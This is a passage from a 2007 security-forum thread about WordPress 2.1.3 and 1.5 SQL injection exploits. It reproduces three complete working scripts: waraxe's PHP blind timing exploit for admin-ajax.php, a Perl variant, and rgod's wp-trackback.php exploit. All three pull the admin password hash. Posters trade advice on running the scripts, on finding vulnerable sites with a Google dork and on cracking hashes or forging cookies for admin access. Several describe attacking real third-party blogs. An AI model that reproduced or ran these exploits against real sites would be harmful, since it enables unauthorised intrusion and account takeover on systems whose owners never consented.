Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
August 26, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 228
Members: 0
Total: 228
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit ver. 2 Goto page Previous  1, 2, 3, 4  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Sat Jun 30, 2007 5:42 pm Reply with quote
scorpion
Regular user
Regular user
 
Joined: Jun 20, 2007
Posts: 10




Okay, I have attacked a WP 2.1.3 installation with this script and I got dbff23c64c0369382f5fd24f69d03695 as the user_pass and admin as the user. I have gotten help with cracking this to: c71c34

Still, if I try to log in to that blog with username admin and pass c71c34 I just get a message that the login is incorrect. Why?
View user's profile Send private message
PostPosted: Sat Jul 14, 2007 6:15 pm Reply with quote
bittertruth
Regular user
Regular user
 
Joined: Jul 11, 2007
Posts: 9




I first used this following exploit
Quote:
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://www.somedomain.com/wp-admin/admin-ajax.php';
$testcnt = 900000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! Smile \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...\n";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}

echo "\nFinal result: $field=$out\n\n";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min\n";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

and it returns something like this
Quote:
Target: http://www.somedomain.com/wp-admin/admin-ajax.php sql table prefix: wp_ cookie suffix: be6e5691340cfc7e6fee375bd68894c3 testing probe delays

The exploit couldn't go below the testing probe delays message. Don't know where i went wrong.

I checked that somedomain.com and found it has no admin-ajax.php in it. So, after checking a while around, i found an exploit for older version but gave me some strange errors.

could you please help me.
View user's profile Send private message
PostPosted: Sat Jul 14, 2007 10:32 pm Reply with quote
dnc
Regular user
Regular user
 
Joined: Jul 09, 2007
Posts: 8
Location: USA




For all of those having trouble
For windows:
Install WAMP www.wampserver.com/en/
run
left click on the tray icon. select "PHP settings" then select "PHP extensions" find "php_curl" in the list, and select it. Close all menus. Once again click on the wamp tray icon (looks like a spedometer). This time select "Config Files" then select "php.ini" it will come up in notepad or something. pres ctr+f type: "max" (no quotes). Press enter 2 times. change max_execution_time to 999. Save the file. once again select the tray icon and select "restart all services" Make sure you have the exploit saved as something.php in your wamp/www/ folder. open firefox. type localhost/something.php

oh and to find vulnerable site type:"is powered by WordPress 2.1.3" in google.
View user's profile Send private message
PostPosted: Sun Jul 15, 2007 12:15 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Important notice - this exploit script is meant to be run as CLI!!!
Running it through apache is wrong. It is written for PHP Command Line Interface!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jul 15, 2007 1:05 am Reply with quote
dnc
Regular user
Regular user
 
Joined: Jul 09, 2007
Posts: 8
Location: USA




Apparently it works. I dont read instructions... Razz
But whatever.
View user's profile Send private message
PostPosted: Sun Jul 15, 2007 8:36 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Some other exploit for wordpress 2.1.3.Tested.Working very fine.


Code:
#!/usr/bin/perl -w

use LWP;
use POSIX qw(ceil floor);
use Digest::MD5 qw(md5_hex);
our $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; windows 5.1)',timeout=>10);
$|=1;

die("use: ./wpajax.pl [url]http://localhost/wp/[/url] wp_ [d]\n") if $#ARGV<1;

$cookiehash=md5_hex(substr($ARGV[0],0,-1));
print $cookiehash."\n";

sub tpost{
$data='cookie=wordpressuser_'.$cookiehash.'=admin%2527 and IF(ORD(SUBSTRING(user_pass,'.$_[1].',1))>'.$_[0].',(select 1 from '.$ARGV[1].'options),0)/*; wordpresspass_'.$cookiehash.'%253dx';
$req = new HTTP::Request 'POST',$ARGV[0].'wp-admin/admin-ajax.php';
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res=$ua->request($req);
$content=$res->content;
print $content."\n" if $ARGV[2];
if($content!~ m/<div id='error'>/){
return 0;
}
else{
return 1;
}}

@min=(48,97);
@max=(57,102);

for($a=1;$a<=32;$a++){
if(tpost(60,$a)==0){
$n=$min[0];
$x=$max[0];
}
else{
$n=$min[1];
$x=$max[1];
}
$next=0;
while($next==0){
$num=floor($n+($x-$n)/2);
if(($x-$n)<2){
if(tpost($n,$a)==0){
$x=$n;
}
else{
$n=$x;
}}
else{
if(tpost($num,$a)==0){
$x=$num;
}
else{
$n=$num;
}}
if($n==$x){
print chr($x);
$next=1;
}}}
print "\n";
View user's profile Send private message
PostPosted: Sun Jul 15, 2007 9:00 am Reply with quote
bittertruth
Regular user
Regular user
 
Joined: Jul 11, 2007
Posts: 9




Koko, i'm not so much used to in Perl, can you suggest me some working php exploits. or any workarounds to find if the remote site is protected or not.. rather than trying to execute exploits on and on, and finding them later not work.. is it the only method to find out that site is protected/patched? .. or is there any way to find before hand in a sense, before executing exploits.

waraxe, are we not supposed to run it as dnc suggested?? or should we upload it to remote ftp and run the script that way? i'm getting so much confused and reading notes off google, they are so overwhelming..
View user's profile Send private message
PostPosted: Sun Jul 15, 2007 9:21 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Download and install ActivePerl if you don't have.Go to Tools>>Folder Options>>File Types and find PL extension change him to use Perl command line interpreter.Save exploit to your PC.Open cmd folder and type full path to exploit. C:\scripts\blabla.pl vistim.com/wordpress/ wp_ and just press Enter.Working site i give you in PM to practis.

For php i use xampp.Go to folder where is php.Right click on folder php and use this http://rapidshare.com/files/43009181/cmd_folder.reg.html (Merge on your system).Then you push right click on mouse you see "Open DOS here" push and cmd is open.Type php.exe C:\scripts\wordpress2.1.3.php and Enter.
View user's profile Send private message
PostPosted: Sun Jul 15, 2007 10:48 am Reply with quote
bittertruth
Regular user
Regular user
 
Joined: Jul 11, 2007
Posts: 9




koko,
i've web developer server suite v 0.999(beta) installed. It's just like WAMP or XAMP but much more added addons and easy to configure files through it. I'm a web designer,not a web developer but for script testing purpose i use web developer suite.

You gave me reference to OPEN to DOS reg hack. Which i normally do myself after fresh install of XP or other Windows .
(Sorry, i'm not trying perl for the time being)

One thing is eating me, is it not the same thing running the php script from DOS mode(like you described) or from browsers "http://localhost/... "

and thanks for your pm, koko.

besides, in the php script below, as you(koko) wrote somewhere, it's for old version of wordpress. will it work for wordpress 1.5? I'm confirming wordpress 1.5 because on the sites source i found something like <meta name="generator" content="WordPress 1.5" /> though version was hidden in front page of the site. i think the script is Wordpress 1.5. if i'm not wrong.

Code:
<?php
print_r('
---------------------------------------------------------------------------
Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to wordpress
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
 -t[prefix]:  specify a table prefix (default: wp_)
Example:
php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
---------------------------------------------------------------------------
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="wp_";

for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
  $prefix=str_replace("-t","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

echo "\npwd hash   -> ";
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
        if (in_array($i,$chars))
        {
        $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_pass,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
        }
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

echo "admin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
          $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

function is_hash($hash)
{
 if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
  echo "exploit succeeded...";
}
else {
  echo "exploit failed...";
  }

?>


from the code above, entering details are something like as:
Code:
Usage: php '.$argv[0].' host path OPTIONS
host:      something.com
path:      something.com/
Options:
 -p[port]:    81
 -P[ip:port]: specify a proxy
 -t[prefix]:  specify a table prefix (default: wp_)

have i done it correctly or is there something missing?

And when i go to wordpress official site(org), i found following file, http://wordpress.org/wordpress-1.5-strayhorn.md5
what is it for?? any clue. it was there on download section. (i asked this stupid question because there is Md5 issues on this forum for lot)

Regards
View user's profile Send private message
PostPosted: Sun Jul 15, 2007 11:09 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Easy way to check version of wordpress victim.com/wp-rss.php and look source code of the page.

I think this exploit not work on wordpress 1.5.Check this for 1.5 version
http://milw0rm.com/search.php
View user's profile Send private message
PostPosted: Mon Jul 16, 2007 7:06 am Reply with quote
bittertruth
Regular user
Regular user
 
Joined: Jul 11, 2007
Posts: 9




koko, thanks

i found it as 1.5 ,

i found some exploits for wordpress v1.5.1...(but not exactly for 1.5..am still searching for it) and so,. and hopefully executed. but returns some error again.

I tried these two exploits, and i followed the exact steps as you shown to run .pl perl files and it worked.
http://milw0rm.com/exploits/1033
http://milw0rm.com/exploits/1059

The errors i get in Command line is something like this :
1.
C:\www\perl\bin>perl C:\myadmin.pl -h http://www.somedomain.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WordPress 1.5.1.1 exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+---[x] STEP 1 - TRY GET ADMIN INFO
ERROR : Forum not vulnerable or bad prefix.

2.
C:\www\perl\bin>perl C:\attack.pl http://www.somedomain.com/ 1

====================================
= Exploit for WordPress <= 1.5.1.1 =
= by Alberto Trivero =
====================================

[+] Connected to: http://www.somedomain.com/
[-] Unable to retrieve username
[-] Unable to retrieve hash of password
View user's profile Send private message
PostPosted: Fri Jul 20, 2007 10:00 pm Reply with quote
buyviagra
Beginner
Beginner
 
Joined: May 28, 2007
Posts: 1




waraxe wrote:
blaxenet wrote:
I've gave the 'exploit' a run, but got the following error:

Code:
WordPress 2.1.3 blind sql injection exploit by waraxe Target: http://www.site.com/wordpress/wp-admin/admin-ajax.php sql table prefix: wp_ cookie suffix: 2554b2e3cc6c5f2f5bf434c94ad7987c testing probe delays test_md5delay(1) - invalid return value, exiting ...


I'm not sure if this is my fault or whether the version of Wordpress isn't correct.

Any idea's?
Thanks Smile


This can mean, that server issues mysql error message. I have seen such problems in some other websites too and this can be related to different sql table structure, maybe because of some modifications in WP installation. So first you must see, what really happens there - try to change this exploit so, that instead of "probe delays test_md5delay(1)" diagnostic message it will print out all data, coming from server. Then, if it's sql error message, then just adjust exploit so that sql clause will be valid to that specific server.


Could you please go into depth on how to do this? I am receiving the same error.
View user's profile Send private message
PostPosted: Sat Sep 29, 2007 8:08 pm Reply with quote
Speller
Beginner
Beginner
 
Joined: Sep 29, 2007
Posts: 2




to koko.
Если можно я на русском! Wink
Запустил я твой експлоит и появилось сразу же 2 вопроса:
1. Что мне делать с этим хэшом дальше? Как ево вернуть в нормальный вид?
2. Почему при разной задержке разные хэши?

$testcnt = 10000:
User ID: 1
Hash: 20000200000002000000000000000000

$testcnt = 25000:
User ID: 1
Hash: 000ab000000000a00000001202300003

Тоесть он разный и чем больше задержка тем сложнее он стает Confused
View user's profile Send private message
PostPosted: Sat Sep 29, 2007 9:06 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Speller wrote:
to koko.
Если можно я на русском! Wink
Запустил я твой експлоит и появилось сразу же 2 вопроса:
1. Что мне делать с этим хэшом дальше? Как ево вернуть в нормальный вид?
2. Почему при разной задержке разные хэши?

$testcnt = 10000:
User ID: 1
Hash: 20000200000002000000000000000000

$testcnt = 25000:
User ID: 1
Hash: 000ab000000000a00000001202300003

Тоесть он разный и чем больше задержка тем сложнее он стает Confused


My russian language is kinda rusty, so I prefer english.

1. If you can get hash, then next you can try to crack it.
For example with Cain:

http://www.oxid.it/cain.html

Or you can just fake the cookies and get admin access without even knowing actual password.
One more choice - post your hash here!

2. $testcnt must be bigger!! Maybe 300000, maybe 800000.
Slow server === bigger #testcnt!
Right now your exploit is not working as expected!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Sep 30, 2007 4:51 am Reply with quote
BludD
Beginner
Beginner
 
Joined: Sep 30, 2007
Posts: 4




hi. i already got past retrieving the hash and the login name. the thing is that i don't have an idea where to go next. by the way, i already sent you a message with some more details. i hope you can help me with it. thanks!
View user's profile Send private message
WordPress 2.1.3 sql injection blind fishing exploit ver. 2
  www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 3 of 4  
Goto page Previous  1, 2, 3, 4  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Movie Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.086 Seconds